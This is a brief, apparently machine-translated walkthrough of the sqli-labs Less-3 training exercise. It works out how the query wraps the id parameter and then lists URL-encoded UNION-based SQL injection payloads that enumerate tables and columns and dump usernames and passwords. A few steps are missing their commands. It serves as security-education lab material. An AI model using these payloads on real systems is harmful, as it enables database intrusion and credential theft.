Sqlilabs-3 (entry notes)

Before that, observe mysql Execute the following command on the database ：

  Then ：

So far, we have found , This id There are already three forms , Integer type  /  ‘’  /  (‘’)  

We can construct the corresponding payload

①： direct ?id=’  Prompt will pop up

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1

Because it means sql The query statement uses ：Select login_name, select password from table where id= (‘our input here’)

②： Start construction payload:

?id=-1%27)%20union%20select%201,database(),3--+  ( Gather information )

③： Starting basis mysql High version feature injection ：

?id=-1%27)union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

?id=-1%27)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+

?id=-1%27)union%20select%201,group_concat(username),group_concat(password)%20from%20security.users--+